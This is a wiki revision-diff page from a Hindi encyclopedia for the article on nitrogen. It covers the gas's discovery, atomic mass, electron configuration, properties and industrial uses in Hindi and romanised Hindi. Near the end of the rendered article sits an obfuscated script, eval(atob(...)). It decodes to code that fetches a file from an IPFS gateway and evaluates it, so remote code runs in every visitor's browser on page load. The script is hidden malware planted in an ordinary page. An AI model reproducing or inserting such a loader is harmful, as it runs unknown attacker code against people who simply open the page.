Difference between revisions of "नाइट्रोजन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:गैस (को हटा दिया गया हैं।))
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
 
{{सूचना बक्सा नाइट्रोजन}}
 
{{सूचना बक्सा नाइट्रोजन}}
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Nitrogen) नाइट्रोजन गैस की खोज रदरफोर्ड ने 1773 में की थी। नाइट्रोजन [[आवर्त सारणी]] का सातवाँ [[तत्व]] है। इसका प्रतीक चिह्न 'N' है। इसका [[परमाणु द्रव्यमान]] 14.0067 होता है। इसका [[इलेक्ट्रॉनिक विन्यास]] 1s<sup>2</sup>, 2s<sup>2</sup>, 2p<sup>3</sup> होता है। इसे आवर्त सारणी के उपवर्ग 5A में रखा गया है।  
+
'''नाइट्रोजन''' ([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:''Nitrogen'') नाइट्रोजन गैस की खोज रदरफोर्ड ने 1773 में की थी। नाइट्रोजन [[आवर्त सारणी]] का सातवाँ [[तत्व]] है। इसका प्रतीक चिह्न 'N' है। इसका [[परमाणु द्रव्यमान]] 14.0067 होता है। इसका [[इलेक्ट्रॉनिक विन्यास]] 1s<sup>2</sup>, 2s<sup>2</sup>, 2p<sup>3</sup> होता है। इसे आवर्त सारणी के उपवर्ग 5A में रखा गया है।  
 
==प्रकृति==
 
==प्रकृति==
 
यह रंगहीन गैस है। वायु में 79 % भाग नाइट्रोजन पाई जाती है। यह गैस जलने में सहायक नहीं है। जलती हुई तीली नाइट्रोजन से भरे जार में ले जाने पर तीली बुझ जाती है। जीव-जन्तुओं व वनस्पतिओं में यह [[प्रोटीन]] के रूप में संचित रहती है। यह [[गैस]] [[श्वसन]] क्रिया में सहायक नहीं है तथा जिससे नाइट्रोजन के [[वायुमण्डल]] में प्राणियों की मृत्यु हो सकती है। उद्योगों में इसका प्रयोग नाइट्रिक [[अम्ल]] व [[अमोनिया]] बनाने में किया जाता है।  
 
यह रंगहीन गैस है। वायु में 79 % भाग नाइट्रोजन पाई जाती है। यह गैस जलने में सहायक नहीं है। जलती हुई तीली नाइट्रोजन से भरे जार में ले जाने पर तीली बुझ जाती है। जीव-जन्तुओं व वनस्पतिओं में यह [[प्रोटीन]] के रूप में संचित रहती है। यह [[गैस]] [[श्वसन]] क्रिया में सहायक नहीं है तथा जिससे नाइट्रोजन के [[वायुमण्डल]] में प्राणियों की मृत्यु हो सकती है। उद्योगों में इसका प्रयोग नाइट्रिक [[अम्ल]] व [[अमोनिया]] बनाने में किया जाता है।  
{{प्रचार}}
+
 
{{लेख प्रगति
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3|माध्यमिक=|पूर्णता=|शोध=}}
|आधार=
 
|प्रारम्भिक=प्रारम्भिक2
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{आवर्त सारणी}}
+
{{आवर्त सारणी}}{{रसायन विज्ञान}}
 
[[Category:रसायन विज्ञान]]
 
[[Category:रसायन विज्ञान]]
 +
[[Category:रासायनिक तत्त्व]]
 +
[[Category:अधातु]]
 +
[[Category:गैसें]]
 
[[Category:विज्ञान_कोश]]
 
[[Category:विज्ञान_कोश]]
[[Category:रासायनिक तत्त्व]]
 
[[Category:गैस]]
 
 
__INDEX__
 
__INDEX__
__NOTOC__
 

Latest revision as of 07:11, 17 February 2021

  1. REDIRECTsaancha:Infobox element

naitrojan (aangrezi:Nitrogen) naitrojan gais ki khoj radaraphord ne 1773 mean ki thi. naitrojan avart sarani ka satavaan tatv hai. isaka pratik chihn 'N' hai. isaka paramanu dravyaman 14.0067 hota hai. isaka ilektr aaunik vinyas 1s2, 2s2, 2p3 hota hai. ise avart sarani ke upavarg 5A mean rakha gaya hai.

prakriti

yah rangahin gais hai. vayu mean 79 % bhag naitrojan paee jati hai. yah gais jalane mean sahayak nahian hai. jalati huee tili naitrojan se bhare jar mean le jane par tili bujh jati hai. jiv-jantuoan v vanaspatioan mean yah protin ke roop mean sanchit rahati hai. yah gais shvasan kriya mean sahayak nahian hai tatha jisase naitrojan ke vayumandal mean praniyoan ki mrityu ho sakati hai. udyogoan mean isaka prayog naitrik aml v amoniya banane mean kiya jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh